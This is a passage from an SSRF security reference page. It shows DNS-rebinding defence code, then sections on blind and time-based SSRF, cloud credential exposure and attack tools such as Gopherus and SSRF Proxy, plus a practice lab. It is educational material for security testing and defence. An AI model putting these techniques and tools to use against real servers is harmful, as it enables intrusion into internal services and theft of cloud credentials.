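    addr = resolve(host, port)[0][4][0]
    return connect(addr, port, host)


def pinned_connect(host, port, resolve=socket.getaddrinfo, connect=tls_connect_pinned):
    """Hardened pattern: one lookup, every answer validated, connect to that IP."""
    addrs = sorted({info[4][0] for info in resolve(host, port)})
    bad = [a for a in addrs if not is_public_ip(a)]
    if not addrs or bad:
        raise ValueError(f"{host} resolves to non-public {bad or addrs}")
    return connect(addrs[0], port, host)


def record_connect(ip, port, host):
    """Constructed connector that only reports where it would have connected."""
    return ip


if __name__ == "__main__":
    print("naive :", naive_connect("app.example.com", 443, RebindingResolver(), record_connect))
    print("pinned:", pinned_connect("app.example.com", 443, RebindingResolver(), record_connect))
```

The pinned address must also be the one reused for retries and for TLS session resumption; any later re-resolution has to go back through the same validation, otherwise the redirect loop in step 4 simply moves the second lookup to a later request.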

## Blind SSRF

The difference between a blind SSRF and a non-blind one is that in the blind case you cannot see the response of the SSRF request. It is therefore harder to exploit, because you will only be able to exploit well-known vulnerabilities.

### Time-based SSRF

By checking the timing of the server's responses it might be possible to tell whether a resource exists or not (accessing an existing resource may take more time than accessing one that does not exist).

## Cloud SSRF exploitation

If you find an SSRF vulnerability in a machine running inside a cloud environment you might be able to obtain interesting information about the cloud environment and even credentials:

{% content-ref url="cloud-ssrf.md" %} cloud-ssrf.md {% endcontent-ref %}

## SSRF vulnerable platforms

Several known platforms contain or have contained SSRF vulnerabilities; check them in:

{% content-ref url="ssrf-vulnerable-platforms.md" %} ssrf-vulnerable-platforms.md {% endcontent-ref %}

## Tools

### SSRFMap

Tool to detect and exploit SSRF vulnerabilities

### Gopherus

This tool generates Gopher payloads for:

  • MySQL
  • PostgreSQL
  • FastCGI
  • Redis
  • Zabbix
  • Memcache

### remote-method-guesser

_remote-method-guesser_ is a _Java RMI_ vulnerability scanner that supports attack operations for most common _Java RMI_ vulnerabilities. Most of the available operations support the --ssrf option, to generate an _SSRF_ payload for the requested operation. Together with the --gopher option, ready-to-use _gopher_ payloads can be generated directly.

### SSRF Proxy

SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).

## Practice

{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}

## References
